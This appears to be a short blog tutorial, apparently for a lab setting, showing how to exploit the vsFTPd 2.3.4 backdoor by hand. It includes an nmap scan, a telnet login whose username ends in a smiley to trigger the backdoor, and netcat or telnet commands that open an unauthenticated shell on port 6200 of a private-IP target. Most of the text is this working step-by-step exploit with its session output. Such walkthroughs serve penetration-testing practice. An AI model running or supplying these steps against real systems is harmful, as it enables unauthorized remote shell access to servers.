Manual vsFTPd Vulnerability Exploitation

vsftpd, (or very secure FTP daemon)  is an FTP server for Unix-like systems, including Linux, vsftpd is the default FTP server in the Ubuntu, CentOS, Fedora, NimbleX, Slackware and RHEL Linux distributions.

nmap -p0-65535 192.168.2.129

Featured image

root@kali:~# telnet 192.168.2.129 21
Trying 192.168.2.129...
Connected to 192.168.2.129.
Escape character is '^]'.
220 (vsFTPd 2.3.4)

In July 2011, it was discovered that vsftpd version 2.3.4 downloadable from the master site had been compromised. Users logging into a compromised vsftpd-2.3.4 server may issue a “: )” smileyface as the username and gain a command shell on port 6200. This was not an issue of a security hole in vsftpd, instead, someone[clarification needed] had uploaded a different version of vsftpd which contained a backdoor. Since then, the site was moved to Google App Engine.

Lets try to exploit without metasploit.

Try to connect the vsFTPd server using USER  name and PASS

Note :  User name should end with smiley “: ) ” 🙂

Whenever user connect to the vsFTPd server smiley it will opens the backdoor connection and enables the port 6200 in ftp server.

root@kali:~# telnet 192.168.2.129 21
 Trying 192.168.2.129...
 Connected to 192.168.2.129.
 Escape character is '^]'.
 220 (vsFTPd 2.3.4)
 USER invalid: )
 331 Please specify the password.
 PASS dont know
 ^]
 telnet> quit
 Connection closed.

Close the telnet session and connect it back to 6200 port using netcat or telnet.

nc 192.168.2.129 6200

or

telnet 192.168.2.129 6200

It will allows the user to connect the vsFTPd server without authentication.

Featured image

Done 🙂

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s